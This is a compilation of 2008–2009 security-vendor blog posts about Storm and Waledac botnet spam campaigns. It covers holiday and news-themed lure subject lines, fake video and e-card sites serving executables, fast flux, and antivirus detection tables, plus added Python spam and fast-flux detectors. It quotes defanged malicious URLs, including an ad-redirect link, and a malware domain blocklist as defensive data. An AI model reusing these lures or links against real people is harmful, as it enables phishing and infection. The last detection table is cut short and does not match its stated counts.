In my copious amounts of spare time, one of the things I like to think about is where the threat landscape is headed. In just the ten years since the Melissa virus (yes, I know viruses go back quite a bit further than that; I'm just using it as a reference point) we have gone from mass-mailing viruses, to network worms that race through a network compromising every vulnerable host they can reach, to social engineering tricks that sometimes make it hard even for a trained professional to tell real from fake.
So, the question I pose to myself is "What's next?" Taking just the events of the last decade into account, where are we headed over the next few years? Some of this is hard to determine because it also means forecasting what new technologies will be released, but we can start to make some assumptions based on what is available today.
Since this is a blog post, I'll try to keep this relatively brief. Maybe it is something that I can submit as an article to some technology pub as a full byline article (Here's a free plug for the folks over at (IN)Secure Magazine, who just released Issue 22 today. I like them and I've had the opportunity to write for them twice now) at some point soon.
Some things to think about:
-- The Insider Threat
Especially given the current economic conditions, and the uneasiness in many offices around the country about whether their companies will remain viable, organizations need to be ever cognizant of the data leaving their walls. The USB 3.0 specification released in November 2008 allows for transfer speeds of about 5 Gbit/s, so sensitive, proprietary corporate data can be pulled off a company's network and onto a thumb drive faster than ever before. Couple that with the number of disgruntled employees who either see the writing on the wall for their own jobs or are upset about benefit and wage freezes and cutbacks, and you have a dangerous cocktail for data theft. We need to put as much focus on protecting our sensitive assets from insiders, who have far easier access to proprietary data, as we do on keeping external threats at bay.
-- VoIP
Voice over Internet Protocol (VoIP) technologies are being adopted at an ever increasing rate, not only in the enterprise but in the consumer market. Services like Vonage make it easier than ever for people to have portable phone numbers so that out-of-state family members can reach them at a local number, and VoIP deployments in organizations are becoming ever more popular as well. As these technologies become more widely adopted we have started to see hints of what abuse of them looks like. Throwaway phone numbers used to place spam calls are becoming more common, and there are services online that sell throwaway numbers in blocks. Spammers can use and abuse these numbers just as they do IP addresses today.
Another thing to watch out for is the compromise of VoIP systems as vulnerabilities start coming out in larger quantities. Threats like direct voicemail injection will become another method that cyber criminals will use in order to get advertisements delivered to end users. As the social engineering used in these threats improves, they could easily be used to steal personal identities and corporate data.
-- Mobile Malware
Let's face it. The phones that we carry in our pockets are little personal computers. Although they lack the computing power of the quad-core processors now becoming commonplace on personal computers, they are another "always connected" device that people always have turned on. I think the only time that I turn mine off on a weekly basis is when we are doing our weekly recording of the Security Buzz podcast, and that is mainly because the GSM buzz wreaks havoc with the microphones (and our Executive Producer's headphones :) ). As mobile phone manufacturers have opened up their APIs to developers to create third party applications, they will need to be ever diligent in their QA processes to make sure that applications don't get posted to their distribution channels that contain some form of malware or open up a trojan backdoor to the device. The mobile phone industry is growing by leaps and bounds with the addition of new, better, more feature rich smartphones entering the market. The smartphone market is too large of a target for cyber criminals to ignore, especially if you consider the value of the data that we are now storing on these devices. Secure sandboxing of third party applications is a must, but that is only a start. Only hundreds of mobile malware variants exist today (compared to the approximately 1 every 4 seconds that is released for PCs), but that number is slowly growing and as hackers pay more attention to how they can penetrate mobile devices, that number is sure to only increase.
-- Social Networking
Social networks mark an interesting shift in the information sharing game because the rules that typically govern what personal data people are willing to share seem to have gone out the window, and that has opened the door for cyber criminals. With the data now available through sites like Facebook, MySpace, and Twitter, criminals can far more easily target attacks at specific individuals or groups, using data exposed in public profiles or geolocation tools that map an IP address to the town you live in (or near), and deliver compelling content that directs you to malware-infected downloads (à la the Waledac botnet). The web of trust between users on social networking sites is being actively exploited by hackers who count on the fact that users will click on whatever their friends send them. It has already been shown that people will click links and open attachments from people they don't know, so why would they scrutinize content from people they do?
-- Political Hacktivism
Recently cyber criminals have picked up the pace a bit with respect to using online resources like social networking sites to quickly spread political messages in order to help them spread propaganda and recruit people to fight for their cause. Due to the sensitive nature of political issues and the passion that people have for them, social engineering techniques like creating highly controversial views on sensitive topics is something that cyber criminals will latch onto in order to get people to react quickly and irresponsibly to either open attachments or visit websites that they would normally scrutinize more closely.
These are only a small sampling of what I believe we will encounter as we move forward (I didn't even go into the increasing compromise of legitimate web sites, the further use of file sharing services, or calendar spam!), but they are things we will need to keep top of mind as we look at the threats coming down the road. Hackers will go where the money is, and the money is where the people are. So whether it is Twitter, MySpace, Facebook, email, instant messenger, or our phones, criminals will leverage whatever technology is available, because in their eyes the goal is to make money regardless of the technology. Whoever first figures out how to exploit a technology for financial gain gets the lion's share of the notoriety and beats the defense mechanisms to the punch.
Last month we discussed the abuse of Twitter's Trending Topics system to increase the ranking of interesting topics so that links can be distributed via Tweets that lead users to phishing and malware sites. This tactic was a follow up to previous abuses of Google's PageRank system which accomplished the same purpose.
The commonality with those two scenarios is that the cyber criminals had to do work to increase the ranking or interest of a particular topic in order to lure users to infected web sites.
We are starting to see a new wrinkle: hackers are using already popular Google Trending Topics, the search terms users are actively looking for through Google, to determine what users already want to see, and tailoring their spam and web sites to exploit that curiosity. No work is required on the hacker's part to generate interest organically; it is already being generated by high profile news stories, an approach that has proven very effective through the many iterations of Storm and Waledac over the past couple of years.
An example is being reported by Dan Kaplan at SC Magazine, who says (via Sophos) that cyber criminals have created fake web sites claiming to show nude videos of Erin Andrews, a popular ESPN reporter who was recently videotaped through a peephole. These fake sites are being used to push malware onto curious users' computers, and they could just as easily be used in phishing campaigns to steal users' personal information.
Search criteria for these Erin Andrews videos through Google currently accounts for two out of the top three search trends at the writing of this post.
As predicted in this month's MX Logic Threat Forecast and Report, cyber criminals have decided to take advantage of the July 4th holiday to send out spam that links to a malware infected web site.
All of the messages that our Threat Operations Center has observed thus far have July 4th themed subject lines and brief message bodies consisting of only a few words followed by a link, a tactic the Storm/Waledac folks have used many times before.
Some of the subject lines that we have seen thus far include:
Amazing firework 2009
Amazing Independence Day salute
Amazing Independence Day show
America for You and Me
America the Beautiful
American Independence Day
Bright and joyful Fourth of July
Celebrate Independence
Celebrate the spirit of America
Celebrate with Pride
Celebrating Fourth of July
Celebrating the Glory of our Nation
Celebrating the spirit of our Country
Celebrations have already begun
Fabulous Independence Day firework
Fourth of July Fireworks Shows
God Bless America
Happy Birthday America!
Happy Birthday USA!
Happy Birthday, America!
Happy Fourth of July
Happy Independence Day
Home of the Brave
Independence Day firework broke all records
Let the fireworks begin!
Let's celebrate Independence Day
Light up the sky
Long Live America
Proud to be an American
Sparkling Celebration of Independence Day
Spectacular fireworks show
Stars and Stripes Forever
Super 4th!
The best firework you've ever seen
The best of 4th of July Salute
This Land Is Your Land
Time for Fireworks
Well done 4th!
Traffic so far has been pretty modest, only about 2,500-3,000 messages per hour, and is likely being dampened by the fact that many companies gave their employees July 3rd off this year because Independence Day falls on a Saturday.
Below is a screen shot of a sample message that someone may receive in conjunction with this campaign:
The site that users are lured to when they click the link claims to host a video of a fireworks show, but the link actually downloads an executable file (video.exe) that infects the user's PC when run. So far all of the links that our Threat Operations Center has observed have been subdomains of the "moviesfireworks.com" domain, but our team is on the lookout for more, and this post will be updated as necessary.
Below is a screen shot of the fake video web site.
Here's to everyone having a safe, happy, and malware free July 4th holiday :)
Over the past several weeks we have been watching the Waledac botnet go through a couple of different phases. Back in late January we reported on Waledac returning to its familiar roots of sending out spam that links to malware-infected web sites. Frequently these messages were tied to some sort of holiday and used e-cards as the lure to get potential victims to open the email and visit a malicious web site.
We saw a couple of different iterations of its most recent Valentine's Day campaigns: one for a "Valentine Devkit" (see the link above) and another for the ever popular e-card. Since February 22nd, Waledac has taken a different twist on its usual holiday themes and focused its efforts on something just as timely: the economy. Copying a legitimate web site that helps you save money (who wouldn't want to, given current economic conditions?), couponizer.com, the Waledac folks sent out emails linking to their spoofed lookalike sites. As with many other Waledac/Storm web sites, just about everything on the page is an image. This is generally a dead giveaway to folks who have been tracking Waledac/Storm for some time, but it is a detail likely lost on most users, who are unaware they are being duped. The images link to a binary executable which, when downloaded and run by the user, enlists their PC into the botnet.
Below is a screenshot representation of the fake couponizer site:
Take a moment to visit the real couponizer.com and you will notice that the look alike and legitimate sites bear some similarity.
Since this new variant launched the MX Logic Threat Operations Center has been processing about 15,000 of these messages per hour, a trend that continues 5 days after the tactic's original launch.
Below is a graph that illustrates volumes and shifts in Waledac tactics since 1/23/2009 (the date we started tracking the Devkit variant):
You'll notice that there is no overlap in tactics as Waledac shifts from one template to the next. The Valentine's e-card tactic started on February 9th and the latest Couponizer spoof started on February 22nd.
Another interesting thing to notice from the graph is that we actually saw more Valentine's day e-card spam coming from Waledac AFTER Valentine's Day than before.
Nevertheless, it is clear that the Waledac folks are working very hard to build their botnet back up to the levels its predecessor, Storm, enjoyed before Microsoft's September 2007 MSRT update, which Microsoft credits with mostly taking Storm down. This botnet clearly isn't just about holidays anymore.
Microsoft has announced that it has added Srizbi detection to its Malicious Software Removal Tool (MSRT) with the latest update. As mentioned in the article, Microsoft claimed victory over the Storm botnet after cleaning up over 91,000 Storm-infected PCs within 24 hours of releasing its initial Storm heuristics back in September 2007.
As when the original Storm botnet was mostly eradicated, Srizbi isn't a major player in the spam wars these days. The Srizbi botnet never quite recovered its position as one of the most prevalent spam botnets after McColo was shut down back in November. The Cutwail and Mega-D botnets, which were also largely affected by McColo, are doing quite well for themselves, however.
As Joe Stewart said in the article, Microsoft would have served itself better to go after one of the newer botnets on the scene, like Xarvester or Donbot, or even Cutwail or Mega-D. With all of the news surrounding Conficker, and how that botnet still lies in wait to come alive, it would be another prime candidate. I agree with Joe that it will be nice to get these machines cleaned up, but it isn't going to have an effect on spam volumes.
It looks like the Waledac botnet folks are at it again...new e-card spam with links to malware using a Valentine's Day theme.
The email itself is your standard Valentine's Day e-card lure (subject lines start with "You've got an e-card at <random greeting card domain>"), but unlike many previous incarnations of e-card spam the From address does not try to spoof any of the common greeting card web sites (mistake number 1):
----------------------------------------
Ted just mailed to you an Online greeting card and wrote this to you:
"You're So Sweet!"
You may pick it up from:
hxxp://yyiet.worshiplove.com/?ID=769bdb96a22c0866ea1ecb731
Your eCard will be available for the next 20 days.
----------------------------------------
We have also seen samples of this tactic linking to yourgreatlove.com, a known Waledac domain.
Clicking the link in the email will bring you to a cute web site with puppies giving you "the eyes" enticing you to download their malware:
Clearly there is a disconnect between the email which is telling you to pick up your e-card and the web site which is asking you to download a "Valentine Devkit" (mistake number 2). As a result of this perceived error, volumes are very low (only a few here and there thus far), but this does appear to be a sign that the Waledac gang is gearing up for some kind of Valentine's Day campaign.
The commercial AV guys don't appear to be up on this one yet so keep your eyes open! We'll be monitoring the Waledac guys up to and through Valentine's Day this weekend and will post any new variants that we see coming from these guys here.
Starting during the 8pm MST hour on Thursday night (January 22nd), our Threat Operations Center observed a new Valentine's Day themed spam run that appears to be coming from the Waledac botnet (the new Storm botnet) gang. Following Storm's tradition of holiday themed emails lends further weight to the theory that the folks behind Waledac are the same ones who created Storm.
Emails are short and sweet one liners with content like "Me and You", "In Your Arms", and "With all my love" followed by a web site link. No malware is attached to the email itself. Subject lines also have a love theme to them. Some of the examples that our Threat Operations Center have observed include "Falling in love with you", "I belong to you", and "I love being in love with you". Once the link in the email is clicked the user is brought to a site that has an image of 12 hearts and has the bold text "Guess, which one is for you?" and looks like the following:
Clicking anywhere within the hearts follows a link to an executable file that the user can download and install to infect themselves. Infection does not occur merely by visiting the page; the executable (e.g. you.exe or love.exe) must be run to install the malware.
This page is also using Google Analytics to track number of visitors and where those visitors are coming from.
Volumes have been modest, but have accounted for about 10% of the malicious email we have seen within the past 24 hours. Traffic has been steadily increasing since the messages were first observed, as illustrated in the graph below:
Clearly the old Storm folks are working as hard as they can in efforts to build up their new botnet and are following the old tried and true methods of centering their social engineering tactics around holiday themes. It was very successful for them the last time around so why fix what isn't broken, right? Nevertheless, it still impresses me that tactics like this continue to work and be so effective despite how many times it gets recycled.
*** UPDATE 1/23/2009 3:20pm MST *** Volumes have been steadily increasing over the course of the day. Average volume since 9am is about 11k per hour. We will continue to monitor over the course of the weekend and will post updates as necessary.
*** UPDATE 1/26/2009 8:30am MST *** No significant morphs of this tactic over the weekend. The folks over at shadowserver.org have posted a list of the domains being spamvertised as part of this campaign. If you are not already doing so, you may want to consider blocking access to them. Volumes of this email have been hovering at around 4,000 per hour for the last 36 hours and appeared to take a brief 5 hour hiatus Saturday afternoon between the hours of 2-7pm MST. Maybe they were watching the NHL All Star Festivities :) Current volume graph below ***
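The Waledac/Storm runs described on this page (July 4th, the Valentine's hearts, the Obama lure, the old Storm love notes) all share one shape: a themed subject, a body of a few words, exactly one link, and no attachment, with the payload hosted on a throwaway domain. Below is an added Python example, not MX Logic code and not part of the original post, showing how a mail filter might score that template and pull out the spamvertised hostname for blocklisting, as suggested above. The two messages are constructed for the example; the blocklist holds the three domains named on this page and is otherwise an assumption.

```python
# Added example: score the "one-liner plus link" holiday spam template and
# extract the spamvertised domain. Sample messages are constructed, not
# captured; KNOWN_BAD_DOMAINS holds only the hostnames named in these posts.
import re
from email import message_from_string
from urllib.parse import urlparse

KNOWN_BAD_DOMAINS = {"moviesfireworks.com", "worshiplove.com", "yourgreatlove.com"}

# Holiday / greeting vocabulary that recurs in the quoted subject lines.
THEME_WORDS = re.compile(
    r"\b(independence day|fourth of july|4th of july|fireworks?|americ\w*|"
    r"valentine'?s?|e-?card|love|in your arms)\b", re.I)

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)

def registered_domain(host):
    """Crude eTLD+1: keep the last two labels (fine for .com/.org hosts)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()

def analyze(raw):
    """Return why (or whether) a raw RFC 2822 message matches the template:
    themed subject/body, a body of at most a few words, exactly one URL,
    and a link into a known spamvertised domain."""
    msg = message_from_string(raw)
    subject = msg.get("Subject", "")
    body = ""
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            body += payload.decode(part.get_content_charset() or "utf-8", "replace")
    urls = URL_RE.findall(body)
    words = URL_RE.sub(" ", body).split()          # body text minus the link(s)
    hosts = [urlparse(u).hostname for u in urls]
    domains = sorted({registered_domain(h) for h in hosts if h})
    reasons = []
    if THEME_WORDS.search(subject) or THEME_WORDS.search(body):
        reasons.append("holiday-theme")
    if len(urls) == 1 and len(words) <= 6:
        reasons.append("one-liner-plus-link")
    if set(domains) & KNOWN_BAD_DOMAINS:
        reasons.append("known-bad-domain")
    # The template itself is what we key on; a theme or a bad domain confirms it.
    suspicious = "one-liner-plus-link" in reasons and len(reasons) >= 2
    return {"subject": subject, "domains": domains, "reasons": reasons,
            "suspicious": suspicious}

# Constructed sample in the shape of the July 4th run (subject from the list above).
SAMPLE_SPAM = """\
From: Ted <ted@example.net>
To: victim@example.com
Subject: Happy Fourth of July
Content-Type: text/plain; charset=us-ascii

Light up the sky
http://abc123.moviesfireworks.com/
"""

# Constructed legitimate holiday notice: themed, has a link, but not a one-liner.
SAMPLE_LEGIT = """\
From: hr@example.com
To: staff@example.com
Subject: Office closed Friday July 3rd
Content-Type: text/plain; charset=us-ascii

Reminder: the office is closed on Friday, July 3rd in observance of the
Independence Day holiday. The full calendar is at http://intranet.example.com/holidays
and payroll questions go to hr@example.com as usual. Enjoy the long weekend!
"""

if __name__ == "__main__":
    for sample in (SAMPLE_SPAM, SAMPLE_LEGIT):
        print(analyze(sample))
```

The theme check alone would flag the HR notice, which is why the score keys on the body shape first and treats the theme and the domain hit as confirmation; a real deployment would also feed the extracted domains into the DNS or proxy blocklist.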
....or so spammers would have you believe.
A couple of days before the inauguration of president-elect Barack Obama spammers are sending out political propaganda that would have you believe that Barack Obama no longer wishes to be President of the United States.
Spam emails are being sent out with subject lines such as "Haven't you heard latest news about our president-elect?" (Funny enough, one of these samples originated in Brazil. Is Obama about to be President down there too? :) ), "End-time for USA", and "Who will be our president now?". The messages are single line spam messages with phrases of only a few words followed by a link to a barackobama.com look-alike site. Some of the phrases being used in the emails that we have observed are "Barack Obama abandoned sinking ship" and "Obama doesn't wany anymore to be a president".
The site that users are lured to if they click the link in the email looks like this:
All of the links on the site link to a file named pdf.exe which McAfee is calling part of the Waledec family of malware. Waledec is widely considered to be the new incarnation of the Storm Worm based on its similarities in behavior to the original Storm which has been eradicated.
As is often the case with these new outbreaks, AV detection is scarce so be aware of this new tactic. Taking a brief opportunity to toot our own horn, we predicted this type of attack in the January edition of our Threat Forecast and Report.
Volumes are currently averaging about 4,000 per hour hitting the MX Logic systems. We will continue to monitor this over the weekend and update as necessary.
*** UPDATE 1/19/2009 3:30pm MST *** Volumes have averaged between 5-16k messages per hour over the weekend and into Monday with today's average hovering around 10,000 per hour. No new significant variants have been observed. Below is an updated volume graph:
As you can see, there are still significant peaks and valleys in Obama email message flow which means that this campaign is still actively sending out spam. With Tuesday's inauguration we will continue to monitor for either another resurgence of this tactic or the emergence of another new variant from the PCs responsible for sending out this current spam wave. As soon as anything crops up, we will be sure to make you all aware.
It has been one month since McColo had its upstream bandwidth cut off by Global Crossing and Hurricane Electric. What has changed since?
As we've previously reported ( here and here), immediately after the McColo shutdown we saw a 50-60% decline in spam volume. This drop carried on for about 9 days even though in the middle of all of this McColo was briefly brought back online by TeliaSonera. During this brief uptime the Rustock botnet was able to update itself and point its bots to different command and control hosts. It wasn't until 4 days later that Rustock came back with a vengeance and resumed its normal spamming activities.
Since that time we have also seen the Mega-D botnet come back online as well. The current net result is still positive as spam volumes are still about 40% lower than what they were prior to McColo. This is largely due to the fact that the Srizbi botnet still only shows minor signs of life despite reports that Srizbi is back in the hands of its original owners.
I am still surprised that these botnets were so easy to cripple to begin with, even if only temporarily. What this will lead to, however, is the bigger, better botnet: more redundancy built in, command and control hosts live on multiple networks with bandwidth from multiple providers, and fast flux applied to both its nodes and its nameservers, creating a truly interconnected network that can only be taken down by removing every connected, infected machine. Add encrypted communication between the nodes and some of the DDoS defense mechanisms incorporated by botnets like Storm, and your botnet is bulletproof.
As defenses improve, attack tactics evolve. Just like when Word macro writers realized that they had to move on to the next generation of infection, those who are diligently working on new botnet communication technology are working on the next generation botnets (yes, plural). Get ready.
Of course it is appropriate that on the same day we write about the author of fast flux pleading guilty to a felony that we see another Storm Worm variant come out. Granted, new Storm Worm variants are nothing new. They come out all the time. I figured I would send out some red flags on this one because as of the time of this writing AV identification of this new variant is less than 10%.
The lure is your typical one-liner type of email which has a love lure in the message body such as "I Want You, I Need You, I Love You" or "You are in my heart" followed by a link to a web site that serves up two executables (both linked to Storm).
This is a screen shot of what the site looks like:
Clicking on the banner at the top of the page attempts to download a file named winner.exe. Clicking the "Click Here" link attempts to download mylove.exe.
Here are the virustotal.com results for winner.exe and mylove.exe:
winner.exe:

| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2008.7.1.0 | 2008.06.30 | - |
| AntiVir | 7.8.0.59 | 2008.06.30 | - |
| Authentium | 5.1.0.4 | 2008.06.29 | - |
| Avast | 4.8.1195.0 | 2008.06.30 | - |
| AVG | 7.5.0.516 | 2008.06.30 | - |
| BitDefender | 7.2 | 2008.06.30 | - |
| CAT-QuickHeal | 9.50 | 2008.06.30 | - |
| ClamAV | 0.93.1 | 2008.07.01 | - |
| DrWeb | 4.44.0.09170 | 2008.06.30 | - |
| eSafe | 7.0.17.0 | 2008.06.30 | Suspicious File |
| eTrust-Vet | 31.6.5914 | 2008.06.30 | - |
| Ewido | 4.0 | 2008.06.27 | - |
| F-Prot | 4.4.4.56 | 2008.06.29 | - |
| F-Secure | 7.60.13501.0 | 2008.06.26 | - |
| Fortinet | 3.14.0.0 | 2008.07.01 | - |
| GData | 2.0.7306.1023 | 2008.06.30 | - |
| Ikarus | T3.1.1.26.0 | 2008.06.30 | - |
| Kaspersky | 7.0.0.125 | 2008.07.01 | - |
| McAfee | 5328 | 2008.06.30 | - |
| Microsoft | 1.3704 | 2008.07.01 | - |
| NOD32v2 | 3229 | 2008.06.30 | - |
| Norman | 5.80.02 | 2008.06.30 | - |
| Panda | 9.0.0.4 | 2008.07.01 | Suspicious file |
| Prevx1 | V2 | 2008.07.01 | - |
| Rising | 20.51.02.00 | 2008.06.30 | - |
| Sophos | 4.30.0 | 2008.07.01 | - |
| Sunbelt | 3.1.1509.1 | 2008.06.30 | - |
| Symantec | 10 | 2008.07.01 | - |
| TheHacker | 6.2.96.365 | 2008.07.01 | - |
| TrendMicro | 8.700.0.1004 | 2008.06.30 | - |
| VBA32 | 3.12.6.8 | 2008.06.30 | - |
| VirusBuster | 4.5.11.0 | 2008.06.30 | - |
| Webwasher-Gateway | 6.6.2 | 2008.06.30 | - |

mylove.exe:

| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2008.7.1.0 | 2008.06.30 | - |
| AntiVir | 7.8.0.59 | 2008.06.30 | - |
| Authentium | 5.1.0.4 | 2008.06.29 | - |
| Avast | 4.8.1195.0 | 2008.06.30 | - |
| AVG | 7.5.0.516 | 2008.06.30 | - |
| BitDefender | 7.2 | 2008.06.30 | Trojan.Peed.JLV |
| CAT-QuickHeal | 9.50 | 2008.06.30 | - |
| ClamAV | 0.93.1 | 2008.07.01 | - |
| DrWeb | 4.44.0.09170 | 2008.06.30 | - |
| eSafe | 7.0.17.0 | 2008.06.30 | Suspicious File |
| eTrust-Vet | 31.6.5914 | 2008.06.30 | - |
| Ewido | 4.0 | 2008.06.27 | - |
| F-Prot | 4.4.4.56 | 2008.06.29 | - |
| F-Secure | 7.60.13501.0 | 2008.06.26 | - |
| Fortinet | 3.14.0.0 | 2008.07.01 | - |
| GData | 2.0.7306.1023 | 2008.06.30 | - |
| Ikarus | T3.1.1.26.0 | 2008.06.30 | Email-Worm.Win32.Zhelatin.zy |
| Kaspersky | 7.0.0.125 | 2008.07.01 | - |
| McAfee | 5328 | 2008.06.30 | - |
| Microsoft | 1.3704 | 2008.07.01 | - |
| NOD32v2 | 3229 | 2008.06.30 | - |
| Norman | 5.80.02 | 2008.06.30 | - |
| Panda | 9.0.0.4 | 2008.07.01 | - |
| Prevx1 | V2 | 2008.07.01 | - |
| Rising | 20.51.02.00 | 2008.06.30 | - |
| Sophos | 4.30.0 | 2008.07.01 | - |
| Sunbelt | 3.1.1509.1 | 2008.06.30 | - |
| Symantec | 10 | 2008.07.01 | - |
| TheHacker | 6.2.96.365 | 2008.07.01 | - |
| TrendMicro | 8.700.0.1004 | 2008.06.30 | - |
| VBA32 | 3.12.6.8 | 2008.06.30 | - |
| VirusBuster | 4.5.11.0 | 2008.06.30 | - |
| Webwasher-Gateway | 6.6.2 | 2008.06.30 | - |
So, as you can see, AV pickup so far is all but non-existent (two generic "suspicious file" flags on winner.exe, and one generic flag plus two named detections on mylove.exe), although I am sure it will pick up soon. The IPs hosting the infected URLs are being rotated using fast flux; in just the 15 minutes I have been monitoring some of the sites they have already changed IPs several times.
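The rotation noted above, and the "fast flux both its nodes and its nameservers" design described in the McColo post, can be spotted passively from repeated DNS lookups of a spamvertised hostname: many distinct addresses spread across unrelated networks, very short TTLs, and a nameserver set that itself changes. Below is an added Python example, not from the original post, that turns a series of observed answers into those features and scores them. The observations are constructed to resemble what the post describes and are not real data; the /16 prefix stand-in for "distinct network" and the thresholds are this example's assumptions.

```python
# Added example: score DNS observations for fast-flux behaviour.
# OBSERVED is constructed sample data (documentation ranges), not real
# resolutions of any Storm domain.
import ipaddress

# Each observation: (seconds since first lookup, record type, answers, TTL)
OBSERVED = {
    # Churning A records across three /16s with a 30 s TTL, and rotating NS
    # records (double flux).
    "love.example-flux.invalid": [
        (0,   "A", ["203.0.113.10", "198.51.100.7", "192.0.2.44"], 30),
        (300, "A", ["203.0.113.99", "198.51.100.7", "192.0.2.201"], 30),
        (600, "A", ["192.0.2.5", "203.0.113.150", "198.51.100.250"], 30),
        (0,   "NS", ["ns1.example-flux.invalid", "ns2.example-flux.invalid"], 60),
        (600, "NS", ["ns3.example-flux.invalid", "ns4.example-flux.invalid"], 60),
    ],
    # Ordinary site: one address, long TTL, stable nameservers.
    "www.example-static.invalid": [
        (0,   "A", ["198.51.100.20"], 86400),
        (300, "A", ["198.51.100.20"], 86400),
        (600, "A", ["198.51.100.20"], 86400),
        (0,   "NS", ["ns1.example-static.invalid", "ns2.example-static.invalid"], 86400),
    ],
}

def flux_features(observations):
    """Distinct A addresses, distinct /16 prefixes (a rough proxy for distinct
    networks when no ASN data is at hand), the smallest TTL seen, and whether
    the NS set changed between lookups."""
    a_addrs, prefixes, ns_sets, min_ttl = set(), set(), [], None
    for _, rtype, answers, ttl in observations:
        min_ttl = ttl if min_ttl is None else min(min_ttl, ttl)
        if rtype == "A":
            for ip in answers:
                a_addrs.add(ip)
                prefixes.add(str(ipaddress.ip_network(f"{ip}/16", strict=False)))
        elif rtype == "NS":
            ns_sets.append(frozenset(answers))
    return {
        "distinct_ips": len(a_addrs),
        "distinct_prefixes": len(prefixes),
        "min_ttl": min_ttl,
        "ns_rotated": len(set(ns_sets)) > 1,
    }

def flux_score(features):
    """Heuristic weights (assumed for this example): many addresses across
    many networks with short TTLs is the single-flux signature; rotating
    nameservers adds the double-flux signature."""
    score = 0
    if features["distinct_ips"] >= 5:
        score += 2
    if features["distinct_prefixes"] >= 3:
        score += 2
    if features["min_ttl"] is not None and features["min_ttl"] <= 300:
        score += 1
    if features["ns_rotated"]:
        score += 2
    return score

def classify(host):
    """'fast-flux' when the score clears the (assumed) threshold, else 'normal'."""
    return "fast-flux" if flux_score(flux_features(OBSERVED[host])) >= 4 else "normal"

if __name__ == "__main__":
    for host in OBSERVED:
        print(host, flux_features(OBSERVED[host]), classify(host))
```

In practice the observations would come from a resolver log or a scheduled lookup of the domains pulled out of the spam, and the /16 check would be replaced by an ASN lookup so that a legitimate CDN, which also returns many addresses with short TTLs but from a handful of networks it owns, does not trip the score.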
This is not likely to be the only time this week that we hear from Storm. Last year during the July 4th holiday is when we started to see the big fake e-card Storm surge. Although most people are used to seeing these by now, they always manage to be popular social engineering lures nonetheless.
Expect to see some revisit of Storm sometime later this week. It might not be e-cards, but in following with Storm's tradition of releasing new variants on or near holidays, I would be very surprised if a Storm weren't already brewing.
Starting yesterday (June 18th) we began seeing evidence of a new Storm Worm variant claiming news of a new earthquake in China.
Some of the subject lines associated with these messages include:
2008 Olympic Games are under the threat
A new powerful disaster in China
A new deadly catastrophe in China
China is paralyzed by new earthquake
China's most deadly earthquake
Chinese people are horrified by new earthquake
Countless victims of earthquake in China
Deadly catastrophe in Chinese capital
Death toll in China exceeds 1000000
Death toll in China is growing
Earth tremors in China is going on
Recent earthquake in china took a heavy toll
Recent china earthquake kills million
Terrible earthquake devastated Beijing
The capital of China were collapsed by earthquake
The most powerful quake hits China
Toll mounts in China earthquake
Unprecedented earthquake in China
This is a pretty typical tactic for Storm: ride the wave of current events as a social engineering lure to get users to click links in emails. This variant is built primarily around the Chinese earthquakes, but there is also a mention of the Beijing Olympics, stating that the Olympics are "under the threat."
If a user clicks the link within one of these emails, they are not immediately infected with Storm. They will be directed to a web site (all of the ones that we have seen so far have a .cn TLD) that looks like this:

It is important to note that this is not a real video player, but clicking the player will launch a file named beijing.exe which will infect your PC.
Volume of this variant is pretty low. We are currently seeing on the order of about 900 per hour in our Threat Operations Center. Expect to see similar stories of this nature threatening the safety of the Olympics as well as its participants and visitors as the event gets closer.
We're seeing a new Google-themed spam run with a malware component making the rounds, where the subject line claims that one of the more popular news agencies has released a Special Report on a new video from Osama bin Laden. Volume is currently less than 1% of total inbound virus traffic, so it is pretty low, but it is yet another abuse of Google's infrastructure, this time a google.com ad-click redirect, in an attempt to deliver malware.
Some of the subject lines that we have seen include:
Special issue of news from CNN! Urgent Fresh News Usama Ben Laden!
Special issue of news from CNBC! Urgent Fresh News Usama Ben Laden!
Special issue of news from Financial Times! Urgent Shocking News Usama Ben Laden!
Special issue of news from CNN! Urgent Apocalyptic News Usama Ben Laden!
Special issue of news from Bloomberg! Urgent Fresh News Usama Ben Laden!
You can see a fairly common theme here.
The email itself is somewhat lengthy and mostly discusses the tragedies that bin Laden has orchestrated against targets around the world. The most pertinent parts of the message appear at the top (as usual, many grammatical errors exist throughout the message):
Special issue of news from Reuters! Urgent Dangerous News!
hxxp://www.google.com/pagead/iclk?sa=l&ai=PBXCNHM&num=03311&adurl=http://cavalldemar.org/news_usa.php
Usama bin Laden(Osama bin Laden) one of the largest organizers of terrorist
activity, and similarly the largest leaders of terrorist organization of Al
Kaeda, detained American soldiery force in Iraq.
This particular sample was taken from a message whose subject line claimed the news came from CNN, so the news agency named in the subject line does not necessarily match the one named in the body. Following the link takes the user to a page that serves a file named videousa.exe, which contains the malware.
Also, as of the time of this posting the news_usa.php link from the sample above (the domain is registered in Spain) is still active, and AV identification is spotty: only 13 of the 32 engines below flag the file, several of them only generically or as merely "suspicious":
| Antivirus | Version | Last Update | Result |
| --- | --- | --- | --- |
| AhnLab-V3 | 2008.4.22.0 | 2008.04.21 | Win-Trojan/Agent.77824.DX |
| AntiVir | 7.8.0.8 | 2008.04.21 | TR/Crypt.XPACK.Gen |
| Authentium | 4.93.8 | 2008.04.20 | - |
| Avast | 4.8.1169.0 | 2008.04.21 | - |
| AVG | 7.5.0.516 | 2008.04.21 | Downloader.Zlob.12.AH |
| BitDefender | 7.2 | 2008.04.21 | - |
| CAT-QuickHeal | 9.50 | 2008.04.19 | (Suspicious) - DNAScan |
| ClamAV | 0.92.1 | 2008.04.21 | - |
| DrWeb | 4.44.0.09170 | 2008.04.21 | - |
| eSafe | 7.0.15.0 | 2008.04.17 | Suspicious File |
| eTrust-Vet | 31.3.5720 | 2008.04.21 | - |
| Ewido | 4.0 | 2008.04.21 | Backdoor.Agent.gxg |
| F-Prot | 4.4.2.54 | 2008.04.20 | - |
| F-Secure | 6.70.13260.0 | 2008.04.21 | Backdoor.Win32.Agent.gxg |
| FileAdvisor | 1 | 2008.04.21 | - |
| Fortinet | 3.14.0.0 | 2008.04.21 | - |
| Ikarus | T3.1.1.26 | 2008.04.21 | Trojan.Win32.Revelation |
| Kaspersky | 7.0.0.125 | 2008.04.21 | Backdoor.Win32.Agent.gxg |
| McAfee | 5277 | 2008.04.18 | - |
